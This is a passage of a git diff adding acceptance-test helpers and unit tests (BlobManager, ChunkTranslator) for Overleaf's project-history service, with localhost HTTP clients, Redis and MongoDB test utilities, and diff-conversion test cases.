expect(res.statusCode).to.equal(500) + expect(loggerError).to.have.been.calledWith( + sinon.match({ + err: { + name: 'NeedFullProjectStructureResyncError', + message: 'aborting partial resync: touched doc', + }, + }) + ) + + getFailure(this.project_id, (err, failure) => { + if (err) return cb(err) + expect(failure).to.include({ + error: + 'NeedFullProjectStructureResyncError: aborting partial resync: touched doc', + }) + cb() + }) + } + ) + }, + cb => { + // fails when previous resync did not finish + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert(!addFile.isDone(), 'should not have persisted changes') + assert( + !docContentRequest.isDone(), + 'should not have requested doc content' + ) + done() + } + ) + }) + }) + }) + }) +}) diff --git a/services/project-history/test/acceptance/js/helpers/HistoryId.js b/services/project-history/test/acceptance/js/helpers/HistoryId.js new file mode 100644 index 0000000..1980831 --- /dev/null +++ b/services/project-history/test/acceptance/js/helpers/HistoryId.js @@ -0,0 +1,7 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. 
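+// Module-level counter: nextId() hands out 0, 1, 2, ... so each test run
+// gets deterministic, unique ids to use as fake history ids.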
+let id = 0
+
+export function nextId() {
+  return id++
+}
diff --git a/services/project-history/test/acceptance/js/helpers/HistoryStoreClient.js b/services/project-history/test/acceptance/js/helpers/HistoryStoreClient.js
new file mode 100644
index 0000000..f17dc07
--- /dev/null
+++ b/services/project-history/test/acceptance/js/helpers/HistoryStoreClient.js
@@ -0,0 +1,45 @@
+/* eslint-disable
+  no-unused-vars,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+import { expect } from 'chai'
+import request from 'request'
+import Settings from '@overleaf/settings'
+
+export function getLatestContent(olProjectId, callback) {
+  if (callback == null) {
+    callback = function () {}
+  }
+  return request.get(
+    {
+      url: `${Settings.overleaf.history.host}/projects/${olProjectId}/latest/content`,
+      auth: {
+        user: Settings.overleaf.history.user,
+        pass: Settings.overleaf.history.pass,
+        sendImmediately: true,
+      },
+    },
+    (error, res, body) => {
+      // Bail out on transport errors before touching `res`, and return after
+      // reporting a non-success status so the callback fires only once.
+      if (error) {
+        return callback(error)
+      }
+      if (res.statusCode < 200 || res.statusCode >= 300) {
+        return callback(
+          new Error(
+            `history store returned a non-success status code: ${res.statusCode}`
+          )
+        )
+      }
+      return callback(null, JSON.parse(body))
+    }
+  )
+}
diff --git a/services/project-history/test/acceptance/js/helpers/ProjectHistoryApp.js b/services/project-history/test/acceptance/js/helpers/ProjectHistoryApp.js
new file mode 100644
index 0000000..ae453b7
--- /dev/null
+++ b/services/project-history/test/acceptance/js/helpers/ProjectHistoryApp.js
@@ -0,0 +1,41 @@
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
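+// Boots the project-history app on 127.0.0.1:3054 on the first call to
+// ensureRunning(); callers that arrive while it is starting are queued in
+// `callbacks` and invoked once the server is listening.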
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import { app } from '../../../../app/js/server.js' + +let running = false +let initing = false +const callbacks = [] + +export function ensureRunning(callback) { + if (callback == null) { + callback = function () {} + } + if (running) { + return callback() + } else if (initing) { + return callbacks.push(callback) + } + initing = true + callbacks.push(callback) + app.listen(3054, '127.0.0.1', error => { + if (error != null) { + throw error + } + running = true + return (() => { + const result = [] + for (callback of Array.from(callbacks)) { + result.push(callback()) + } + return result + })() + }) +} diff --git a/services/project-history/test/acceptance/js/helpers/ProjectHistoryClient.js b/services/project-history/test/acceptance/js/helpers/ProjectHistoryClient.js new file mode 100644 index 0000000..92caa4b --- /dev/null +++ b/services/project-history/test/acceptance/js/helpers/ProjectHistoryClient.js @@ -0,0 +1,354 @@ +import { expect } from 'chai' +import request from 'request' +import Settings from '@overleaf/settings' +import RedisWrapper from '@overleaf/redis-wrapper' +import { db } from '../../../../app/js/mongodb.js' + +const rclient = RedisWrapper.createClient(Settings.redis.project_history) +const Keys = Settings.redis.project_history.key_schema + +export function resetDatabase(callback) { + rclient.flushdb(callback) +} + +export function initializeProject(historyId, callback) { + request.post( + { + url: 'http://127.0.0.1:3054/project', + json: { historyId }, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(200) + callback(null, body.project) + } + ) +} + +export function flushProject(projectId, options, callback) { + if (typeof options === 'function') { + callback = options + options = null + } + if (!options) { + options = { allowErrors: false } + } + request.post( + { + url: `http://127.0.0.1:3054/project/${projectId}/flush`, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + if (!options.allowErrors) { + expect(res.statusCode).to.equal(204) + } + callback(error, res) + } + ) +} + +export function getSummarizedUpdates(projectId, query, callback) { + request.get( + { + url: `http://127.0.0.1:3054/project/${projectId}/updates`, + qs: query, + json: true, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(200) + callback(error, body) + } + ) +} + +export function getDiff(projectId, pathname, from, to, callback) { + request.get( + { + url: `http://127.0.0.1:3054/project/${projectId}/diff`, + qs: { + pathname, + from, + to, + }, + json: true, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(200) + callback(error, body) + } + ) +} + +export function getFileTreeDiff(projectId, from, to, callback) { + request.get( + { + url: `http://127.0.0.1:3054/project/${projectId}/filetree/diff`, + qs: { + from, + to, + }, + json: true, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + callback(error, body, res.statusCode) + } + ) +} + +export function getChangesInChunkSince(projectId, since, options, callback) { + 
request.get( + { + url: `http://127.0.0.1:3054/project/${projectId}/changes-in-chunk`, + qs: { + since, + }, + json: true, + }, + (error, res, body) => { + if (error) return callback(error) + if (!options.allowErrors) { + expect(res.statusCode).to.equal(200) + } + callback(null, body, res.statusCode) + } + ) +} + +export function getLatestSnapshot(projectId, callback) { + request.get( + { + url: `http://127.0.0.1:3054/project/${projectId}/snapshot`, + json: true, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(200) + callback(null, body) + } + ) +} + +export function getSnapshot(projectId, pathname, version, options, callback) { + if (typeof options === 'function') { + callback = options + options = null + } + if (!options) { + options = { allowErrors: false } + } + request.get( + { + url: `http://127.0.0.1:3054/project/${projectId}/version/${version}/${encodeURIComponent( + pathname + )}`, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + if (!options.allowErrors) { + expect(res.statusCode).to.equal(200) + } + callback(error, body, res.statusCode) + } + ) +} + +export function pushRawUpdate(projectId, update, callback) { + rclient.rpush( + Keys.projectHistoryOps({ project_id: projectId }), + JSON.stringify(update), + callback + ) +} + +export function setFirstOpTimestamp(projectId, timestamp, callback) { + rclient.set( + Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }), + timestamp, + callback + ) +} + +export function getFirstOpTimestamp(projectId, callback) { + rclient.get( + Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }), + callback + ) +} + +export function clearFirstOpTimestamp(projectId, callback) { + rclient.del( + Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }), + callback + ) +} + +export function getQueueLength(projectId, callback) { + rclient.llen(Keys.projectHistoryOps({ project_id: projectId }), callback) +} + +export function getQueueCounts(callback) { + return request.get( + { + url: 'http://127.0.0.1:3054/status/queue', + json: true, + }, + callback + ) +} + +export function resyncHistory(projectId, callback) { + request.post( + { + url: `http://127.0.0.1:3054/project/${projectId}/resync`, + json: true, + body: { origin: { kind: 'test-origin' } }, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(204) + callback(error) + } + ) +} + +export function createLabel( + projectId, + userId, + version, + comment, + createdAt, + callback +) { + request.post( + { + url: `http://127.0.0.1:3054/project/${projectId}/labels`, + json: { comment, version, created_at: createdAt, user_id: userId }, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(200) + callback(null, body) + } + ) +} + +export function getLabels(projectId, callback) { + request.get( + { + url: `http://127.0.0.1:3054/project/${projectId}/labels`, + json: true, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(200) + callback(null, body) + } + ) +} + +export function deleteLabelForUser(projectId, userId, labelId, callback) { + request.delete( + { + url: `http://127.0.0.1:3054/project/${projectId}/user/${userId}/labels/${labelId}`, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(204) + callback(null, body) + } + ) +} + +export function deleteLabel(projectId, 
labelId, callback) { + request.delete( + { + url: `http://127.0.0.1:3054/project/${projectId}/labels/${labelId}`, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(204) + callback(null, body) + } + ) +} + +export function setFailure(failureEntry, callback) { + db.projectHistoryFailures.deleteOne( + { project_id: { $exists: true } }, + (err, result) => { + if (err) { + return callback(err) + } + db.projectHistoryFailures.insertOne(failureEntry, callback) + } + ) +} + +export function getFailure(projectId, callback) { + db.projectHistoryFailures.findOne({ project_id: projectId }, callback) +} + +export function transferLabelOwnership(fromUser, toUser, callback) { + request.post( + { + url: `http://127.0.0.1:3054/user/${fromUser}/labels/transfer/${toUser}`, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(204) + callback(null, body) + } + ) +} + +export function getDump(projectId, callback) { + request.get( + `http://127.0.0.1:3054/project/${projectId}/dump`, + (err, res, body) => { + if (err) { + return callback(err) + } + expect(res.statusCode).to.equal(200) + callback(null, JSON.parse(body)) + } + ) +} + +export function deleteProject(projectId, callback) { + request.delete(`http://127.0.0.1:3054/project/${projectId}`, (err, res) => { + if (err) { + return callback(err) + } + expect(res.statusCode).to.equal(204) + callback() + }) +} diff --git a/services/project-history/test/setup.js b/services/project-history/test/setup.js new file mode 100644 index 0000000..0bc2ff7 --- /dev/null +++ b/services/project-history/test/setup.js @@ -0,0 +1,13 @@ +import chai from 'chai' +import sinonChai from 'sinon-chai' +import chaiAsPromised from 'chai-as-promised' +import mongodb from 'mongodb-legacy' +const { ObjectId } = mongodb + +// ensure every ObjectId has the id string as a property for correct comparisons +ObjectId.cacheHexString = true + +// Chai configuration +chai.should() +chai.use(sinonChai) +chai.use(chaiAsPromised) diff --git a/services/project-history/test/unit/js/BlobManager/BlobManagerTests.js b/services/project-history/test/unit/js/BlobManager/BlobManagerTests.js new file mode 100644 index 0000000..e5c9b6e --- /dev/null +++ b/services/project-history/test/unit/js/BlobManager/BlobManagerTests.js @@ -0,0 +1,160 @@ +import sinon from 'sinon' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/BlobManager.js' + +describe('BlobManager', function () { + beforeEach(async function () { + this.callback = sinon.stub() + this.extendLock = sinon.stub().yields() + this.project_id = 'project-1' + this.historyId = 12345 + this.HistoryStoreManager = { + createBlobForUpdate: sinon.stub(), + } + this.UpdateTranslator = { + isAddUpdate: sinon.stub().returns(false), + } + this.BlobManager = await esmock(MODULE_PATH, { + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/UpdateTranslator.js': this.UpdateTranslator, + }) + this.updates = ['update-1', 'update-2'] + }) + + describe('createBlobsForUpdates', function () { + describe('when there are no blobs to create', function () { + beforeEach(function (done) { + this.BlobManager.createBlobsForUpdates( + this.project_id, + this.historyId, + this.updates, + this.extendLock, + (error, updatesWithBlobs) => { + this.callback(error, updatesWithBlobs) + done() + } + ) + }) + + it('should not create any blobs', function () { + 
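+        // isAddUpdate is stubbed to return false for every update, so
+        // createBlobForUpdate should never have been invoked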
this.HistoryStoreManager.createBlobForUpdate.called.should.equal(false) + }) + + it('should call the callback with the updates', function () { + const updatesWithBlobs = this.updates.map(update => ({ + update, + })) + this.callback.calledWith(null, updatesWithBlobs).should.equal(true) + }) + }) + + describe('when there are blobs to create', function () { + beforeEach(function (done) { + this.UpdateTranslator.isAddUpdate.returns(true) + this.blobHash = 'test hash' + this.HistoryStoreManager.createBlobForUpdate.yields(null, { + file: this.blobHash, + }) + this.BlobManager.createBlobsForUpdates( + this.project_id, + this.historyId, + this.updates, + this.extendLock, + (error, updatesWithBlobs) => { + this.callback(error, updatesWithBlobs) + done() + } + ) + }) + + it('should create blobs', function () { + this.HistoryStoreManager.createBlobForUpdate + .calledWith(this.project_id, this.historyId, this.updates[0]) + .should.equal(true) + }) + + it('should extend the lock', function () { + this.extendLock.called.should.equal(true) + }) + + it('should call the callback with the updates', function () { + const updatesWithBlobs = this.updates.map(update => ({ + update, + blobHashes: { file: this.blobHash }, + })) + this.callback.calledWith(null, updatesWithBlobs).should.equal(true) + }) + }) + + describe('when there are blobs to create and there is a single network error', function () { + beforeEach(function (done) { + this.UpdateTranslator.isAddUpdate.returns(true) + this.blobHash = 'test hash' + this.HistoryStoreManager.createBlobForUpdate + .onFirstCall() + .yields(new Error('random failure')) + this.HistoryStoreManager.createBlobForUpdate.yields(null, { + file: this.blobHash, + }) + this.BlobManager.createBlobsForUpdates( + this.project_id, + this.historyId, + this.updates, + this.extendLock, + (error, updatesWithBlobs) => { + this.callback(error, updatesWithBlobs) + done() + } + ) + }) + + it('should create blobs', function () { + this.HistoryStoreManager.createBlobForUpdate + .calledWith(this.project_id, this.historyId, this.updates[0]) + .should.equal(true) + }) + + it('should extend the lock', function () { + this.extendLock.called.should.equal(true) + }) + + it('should call the callback with the updates', function () { + const updatesWithBlobs = this.updates.map(update => ({ + update, + blobHashes: { file: this.blobHash }, + })) + this.callback.calledWith(null, updatesWithBlobs).should.equal(true) + }) + }) + + describe('when there are blobs to create and there are multiple network errors', function () { + beforeEach(function (done) { + this.UpdateTranslator.isAddUpdate.returns(true) + this.blobHash = 'test hash' + this.error = new Error('random failure') + this.HistoryStoreManager.createBlobForUpdate.yields(this.error) + this.BlobManager.createBlobsForUpdates( + this.project_id, + this.historyId, + this.updates, + this.extendLock, + (error, updatesWithBlobs) => { + this.callback(error, updatesWithBlobs) + done() + } + ) + }) + + it('should try to create blobs', function () { + this.HistoryStoreManager.createBlobForUpdate + .calledWith(this.project_id, this.historyId, this.updates[0]) + .should.equal(true) + }) + + it('should call the callback with an error', function () { + this.callback.calledWith(this.error).should.equal(true) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/ChunkTranslator/ChunkTranslatorTests.js b/services/project-history/test/unit/js/ChunkTranslator/ChunkTranslatorTests.js new file mode 100644 index 0000000..e4b32c4 --- /dev/null +++ 
b/services/project-history/test/unit/js/ChunkTranslator/ChunkTranslatorTests.js @@ -0,0 +1,3050 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/ChunkTranslator.js' + +describe('ChunkTranslator', function () { + beforeEach(async function () { + this.projectId = '0123456789abc0123456789abc' + this.historyId = 12345 + this.author1 = { + id: 1, + email: 'james.allen@overleaf.com', + name: 'James Allen', + } + this.date = new Date() + this.fileHash = 'some_hash' + this.fileContents = 'Hello world, this is a test' + this.HistoryStoreManager = { + getProjectBlob: sinon.stub(), + } + this.HistoryStoreManager.getProjectBlob + .withArgs(this.historyId, this.fileHash) + .yields(null, this.fileContents) + this.WebApiManager = { + getHistoryId: sinon.stub().callsFake((projectId, cb) => { + console.log({ projectId }) + }), + } + this.WebApiManager.getHistoryId + .withArgs(this.projectId) + .yields(null, this.historyId) + this.ChunkTranslator = await esmock(MODULE_PATH, { + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + }) + this.callback = sinon.stub() + }) + + describe('with changes to the text', function () { + beforeEach(function () { + this.chunk = { + project_id: this.projectId, + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { pathname: 'main.tex', textOperation: ['Hello test, ', -6] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'main.tex', textOperation: [6, 'foo '] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [{ pathname: 'main.tex', textOperation: [6, -4] }], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + origin: { + kind: 'file-restore', + version: 1, + path: 'main.tex', + timestamp: this.date.toISOString(), + }, + operations: [ + { + pathname: 'main.tex', + newPathname: '', + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + origin: { + kind: 'file-restore', + version: 1, + path: 'main.tex', + timestamp: this.date.toISOString(), + }, + operations: [ + { + pathname: 'main.tex', + file: { + hash: this.fileHash, + stringLength: 42, + }, + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'main.tex', + newPathname: 'main2.tex', + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + }) + + describe('convertToDiffUpdates', function () { + it('should convert them to insert and delete ops', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 3, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.fileContents) + expect(updates).to.deep.equal([ + { + op: [ + { i: 'Hello test, ', p: 0 }, + { d: 'Hello ', p: 12 }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + op: [{ i: 'foo ', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + 
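+                // this insert of 'foo ' is reverted by the delete at v2 below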
}, + { + op: [{ d: 'foo ', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + ]) + done() + } + ) + }) + + it('should return the correct initial text if there are previous changes', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 2, + 3, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal( + 'Hello foo test, world, this is a test' + ) + expect(updates).to.deep.equal([ + { + op: [{ d: 'foo ', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + ]) + done() + } + ) + }) + + it('should return the correct initial text in case of file restore', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 3, + 5, + (error, param) => { + const { initialContent } = param + expect(error).to.be.null + expect(initialContent).to.equal('Hello world, this is a test') + done() + } + ) + }) + + it('should still find original file in case it was renamed', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 5, + 6, + (error, param) => { + const { initialContent } = param + expect(error).to.be.null + expect(initialContent).to.equal('Hello world, this is a test') + done() + } + ) + }) + }) + + describe('convertToSummarizedUpdates', function () { + it('should return a summary of which docs changes when', function (done) { + const assertion = (error, updates) => { + expect(error).to.be.null + + expect(updates).to.deep.equal([ + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + pathnames: [], + project_ops: [ + { + remove: { + pathname: 'main.tex', + }, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + origin: { + kind: 'file-restore', + version: 1, + path: 'main.tex', + timestamp: this.date.toISOString(), + }, + }, + v: 3, + }, + { + pathnames: [], + project_ops: [ + { + add: { + pathname: 'main.tex', + }, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + origin: { + kind: 'file-restore', + version: 1, + path: 'main.tex', + timestamp: this.date.toISOString(), + }, + }, + v: 4, + }, + { + pathnames: [], + project_ops: [ + { + rename: { + pathname: 'main.tex', + newPathname: 'main2.tex', + }, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 5, + }, + ]) + done() + } + + this.ChunkTranslator.convertToSummarizedUpdates(this.chunk, assertion) + }) + }) + }) + + describe('with a sequence of inserts and deletes', function () { + beforeEach(function () { + this.fileHash = 'some_other_hash' + this.initialFileContents = 'aa bbbbb ccc ' + this.HistoryStoreManager.getProjectBlob + .withArgs(this.historyId, this.fileHash) + 
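+        // each hash is wired to its own contents, so this fixture starts
+        // from a different document than the default stubbed above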
.yields(null, this.initialFileContents) + + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + '111 ', // -> "111 aa bbbbb ccc " + -3, // -> "111 bbbbb ccc " + 6, // -> "111 bbbbb ccc " + '2222 ', // -> "111 bbbbb 2222 ccc " + -1, // -> "111 bbbbb 2222 cc " + 'd', // -> "111 bbbbb 2222 dcc " + 3, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + }) + + describe('convertToDiffUpdates', function () { + it('should convert them to insert and delete ops', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.initialFileContents) + expect(updates).to.deep.equal([ + { + op: [ + { i: '111 ', p: 0 }, + { d: 'aa ', p: 4 }, + // NOTE: The construction of TextOperation can merge an + // insertion across a deletion operation, which is why this is + // ever so slightly different from the textOperation defined + // in the chunk. Both diffs represent the same change in + // content. + { i: '2222 d', p: 10 }, + { d: 'c', p: 16 }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('should apply them to the text correctly', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 1, + 1, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal('111 bbbbb 2222 dcc ') + expect(updates).to.deep.equal([]) + done() + } + ) + }) + }) + }) + + describe('with unknown operations', function (done) { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [{ unknown: true }], + timestamp: this.date.toISOString(), + authors: [this.author1.id, undefined], + }, + { + operations: [ + { pathname: 'main.tex', textOperation: [3, 'Hello world'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id, undefined], + }, + ], + }, + }, + authors: [this.author1.id], + } + }) + + describe('convertToDiffUpdates', function () { + it('should ignore the unknown update', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 2, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.fileContents) + expect(updates).to.deep.equal([ + { + op: [{ i: 'Hello world', p: 3 }], + meta: { + users: [this.author1.id, null], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + ]) + done() + } + ) + }) + }) + + describe('convertToSummarizedUpdates', function () { + it('should ignore the unknown update', function (done) { + const assertion = (error, updates) => { + expect(error).to.be.null + expect(updates).to.deep.equal([ + { + pathnames: [], + project_ops: [], + meta: { + users: [this.author1.id, 
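+                    // the undefined author in the chunk surfaces as null here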
null], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id, null], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + ]) + done() + } + + this.ChunkTranslator.convertToSummarizedUpdates(this.chunk, assertion) + }) + }) + }) + + describe('with changes to multiple files', function (done) { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + 'other.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { pathname: 'other.tex', textOperation: [0, 'foo'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'main.tex', textOperation: [6, 'bar'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'other.tex', textOperation: [9, 'baz'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'main.tex', textOperation: [12, 'qux'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + }) + + describe('convertToDiffUpdates', function () { + it('should only return the changes to the requested file', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 4, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal('Hello world, this is a test') + expect(updates).to.deep.equal([ + { + op: [{ i: 'bar', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + { + op: [{ i: 'qux', p: 12 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + ]) + done() + } + ) + }) + }) + + describe('convertToSummarizedUpdates', function () { + it('should return a summary of which docs changes when', function (done) { + const assertion = (error, updates) => { + expect(error).to.be.null + expect(updates).to.deep.equal([ + { + pathnames: ['other.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + { + pathnames: ['other.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + ]) + done() + } + + this.ChunkTranslator.convertToSummarizedUpdates(this.chunk, assertion) + }) + }) + }) + + describe('when the file is created during the chunk', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { pathname: 'main.tex', textOperation: [6, 'bar'] }, + ], + 
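+                // v0 touches only main.tex; new.tex is added at v1 below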
timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'new.tex', + file: { hash: this.fileHash, stringLength: 10 }, + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'new.tex', textOperation: [6, 'bar'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'new.tex', textOperation: [9, 'baz'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1], + } + }) + + describe('convertToDiffUpdates', function () { + it('returns changes after the file was created before the fromVersion', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'new.tex', + 2, + 4, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.fileContents) + expect(updates).to.deep.equal([ + { + op: [{ i: 'bar', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + op: [{ i: 'baz', p: 9 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + ]) + done() + } + ) + }) + + it('returns changes when the file was created at the fromVersion', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'new.tex', + 1, + 4, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.fileContents) + expect(updates).to.deep.equal([ + { + op: [{ i: 'bar', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + op: [{ i: 'baz', p: 9 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + ]) + done() + } + ) + }) + + it('returns changes when the file was created after the fromVersion', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'new.tex', + 0, + 4, + (error, param) => { + if 